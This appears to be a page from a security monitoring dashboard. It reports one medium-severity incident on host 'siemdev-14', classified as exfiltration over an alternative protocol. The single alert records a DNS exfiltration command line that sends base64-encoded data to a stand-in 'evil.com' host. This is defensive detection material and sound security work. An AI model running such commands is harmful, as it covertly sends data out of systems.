Back to list

Medium CINC-20251220-5494C958 new

Aggregate ID: aggind:021368f9220b45cdb2760a069897c1c8:17607314129

Incident Overview

Incident ID CINC-20251220-5494C958
Severity Medium (70)
Status new
Alert Count 1
Host Count 1

Timeline

First Seen 2025-12-14 04:34:41
Last Seen 2025-12-14 04:34:41
Duration 0d 0h 0m
Created 2025-12-20 13:23
Updated 2026-01-13 15:14

Kill Chain Analysis

Rec... Ini... Exe... Per... Pri... Def... Cre... Dis... Lat... Col... Com... Exf... Imp...
Observed Tactics:
Exfiltration
Techniques:
Exfiltration Over Alternative Protocol

Affected Hosts (1)

siemdev-14

Related Alerts (1)

Severity Status Hostname Description Tactic Command Line Time
High new siemdev-14 Adversaries may steal data by exfiltrating it over a different protocol than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server. Investigate the process tree. Exfiltration dig c2VjcmV0Cg==.exfil.evil.com 12-14 04:34